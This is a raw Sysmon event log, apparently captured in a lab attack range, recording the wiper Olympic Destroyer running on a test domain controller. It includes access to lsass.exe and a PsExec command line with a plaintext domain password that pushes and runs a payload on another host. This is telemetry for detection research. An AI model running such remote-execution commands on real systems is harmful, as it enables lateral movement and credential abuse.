10:57:26.207{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.207{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.145{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1316-6216-4A06-000000003802}6848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.145{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1316-6216-4A06-000000003802}6848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.132{C8EA50B7-1316-6216-4A06-000000003802}68487116C:\Windows\system32\conhost.exe{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.091{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1316-6216-4A06-000000003802}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:26.091{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1316-6216-4A06-000000003802}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.960{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.960{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000293008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.960{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.944{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.954{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.944{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.929{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.929{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.929{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.927{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.926{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:25.907{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000292998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:25.876{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.775{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4806-000000003802}4568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.775{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4806-000000003802}4568C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.775{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4706-000000003802}344C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.775{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4706-000000003802}344C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:27.698{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE230F40FF6921548CEB07E6FBA2325,SHA256=C65534653AB16649066F2845F7C0E340C5AF212239DAAFB844C5052F40567B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:27.861{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6533BC84EC4AB506BEB9C1232330AE87,SHA256=73C389C0B8932694C34358D237204FC5C2FCFE87235EE9BD05564F6798A80AE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:27.666{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:27.527{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3252B344EE38F7500A706FB64B26842F,SHA256=1BEE42807377D6504BAC3750755362CFD7F97B322AA0582FC1D69552EED9BDA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53757-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:27.125{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-141MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:26.661{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51419-false10.0.1.12-8000- 23542300x8000000000000000217810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:28.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADE2D326806D131A3B23B493A7429E68,SHA256=5865F545DFB4CC0E1A6C5F9769F97CD104FA9A772BED5E0374E0CF85E61001B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.830{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.830{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.830{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.830{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 